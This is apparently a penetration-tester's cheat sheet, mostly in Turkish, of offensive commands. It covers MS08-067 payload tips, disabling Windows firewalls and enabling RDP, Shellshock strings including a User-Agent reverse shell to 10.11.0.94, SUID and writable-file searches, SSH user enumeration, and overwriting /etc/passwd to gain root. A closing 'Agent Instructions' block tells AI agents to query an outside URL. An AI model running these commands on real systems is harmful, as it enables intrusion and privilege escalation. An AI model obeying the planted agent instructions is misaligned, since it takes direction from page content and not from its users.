# Notes\*

Eğer ms08-67 exploiti var olmasına rağmen exploit edilemiyorsa veya encoding hatası alınırsa payloadı değiştir. Daha küçük payloadlar kullan. windows/shell\_reverse\_tcp gibi. meterpreter kullanma. payload büyük olursa metasploit "Exploit failed: No encoders encoded the buffer successfully." hatasını verir.

&#x20;\*\***Eğer administrator hesabı pasif ise STATUS\_USER\_SESSION\_DELETED hatası verilir**&#x20;

## Enable RDP

```
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
```

User Yoksa:&#x20;

ERROR: Failed to open connection - NT\_STATUS\_LOGON\_FAILURE

User ve ama yetki yoksa ERROR:&#x20;

Cannot connect to svcctl pipe. NT\_STATUS\_ACCESS\_DENIED.

exploitin başarılı olması için IPC$ paylaşımına erişmesi lazım.&#x20;

"You just need access to the IPC$ share, not a named pipe."

### Disable Firewall

```
XP:
netsh firewall set opmode mode=DISABLE

New Windows Ver:
netsh advfirewall set allprofiles state off
```

### Compile C code to exe in Linux

```
i686-w64-mingw32-gcc 646.c -lws2_32 -o 646.exe
```

### ShellShock

```
env x='() { :;}; echo vulnerable' bash -c "ps aux"
env x='() { :;}; /usr/bin/id' /bin/bash -c "/usr/bin/id"
/usr/bin/env x='() { :;}; /usr/bin/id' /bin/bash -c "ps aux"
```

Find writable files for user: `find / -writable -type f 2>/dev/null | grep -v ^/proc`&#x20;

&#x20;Find files which have stickey bit on `/bin/find / -perm -4001 -type f 2>/dev/null`

### shellshock

```
User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.11.0.94/1234 0>&1
```

### Add diretory to PATH

```
export PATH=$PATH:/usr/bin/
```

### Samba version

```
msf > scanner/smb/smb_version
```

### 64 Bit c and c++ compile in Linux

```
# C
i686-w64-mingw32-gcc hello.c -o hello32.exe      # 32-bit
x86_64-w64-mingw32-gcc hello.c -o hello64.exe    # 64-bit
 
# C++
i686-w64-mingw32-g++ hello.cc -o hello32.exe     # 32-bit
x86_64-w64-mingw32-g++ hello.cc -o hello64.exe   # 64-bit
```

### ssh user enumeration

```
for user in $(cat users.txt); do python sshuserenum.py --username $user IP; done
```

### udev 2.6

[udev exploit tutorial](https://blackwintersecurity.com/tutorials/)

### If /etc/passwd is writable;

```
$ echo root::0:0:root:/root:/bin/bash > /etc/passwd
```

then;

```
su
```

root is gained!

### writable file and directory

```
find / -writable -type d 2>/dev/null
find / -writable -type f 2>/dev/null
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://security.musana.net/notes.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.